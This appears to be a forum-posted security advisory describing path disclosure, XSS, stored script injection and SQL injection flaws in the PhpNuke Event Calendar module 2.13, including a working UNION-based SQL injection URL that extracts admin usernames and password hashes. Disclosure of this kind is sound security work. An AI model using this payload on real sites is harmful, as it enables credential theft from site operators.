PhpNuke Event Calendar Module

[Mobo]

PhpNuke Event Calendar Module Multiple Vulnerabilities
Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004



This piece of sowtware has many security related flaws due to poor user-submitted data handling.

A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 14 Warning: main(): Failed opening 'mainfile.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 14 Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in
D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 19 Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.p hp on line 19

A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php

B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=C...le=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=C...p2=Preview&day=[xss
code here]
http://localhost/nuke73/modules.php?name=C...t&op2=Preview&m
onth=[xss code here]
http://localhost/nuke73/modules.php?name=C...2=Preview&year=[xss
code here] http://localhost/nuke73/modules.php?name=C...t&op2=Preview&t
ype=[xss code here]

C - script injection in calendar event comments:

It's serious bug - anyone can insert javascript exploit code to event comments and if user or admin will read it, javascript will trigger and bad things can happen - like cookie theft, arbitrary admin operations, etc.

D - critical sql injection bugs in code:

If we take a deep look at source code, then there can be found multiple sql queries, where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single quotes. Therefore sql injection is possible. Further exploitation will depend on database software and version. In case of the mysql version 4.x with UNION functionality enabled, arbitrary data can be retrieved from database, inluding admin(s) authentication credentials. As tradition, there is proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=
index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,
1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_auth ors
%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004

Since then no more response from software developer and downloadable version still unpatched.

For help with patching look @ here - http://www.waraxe.us/forums.html

Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/bas...e64-encoder.php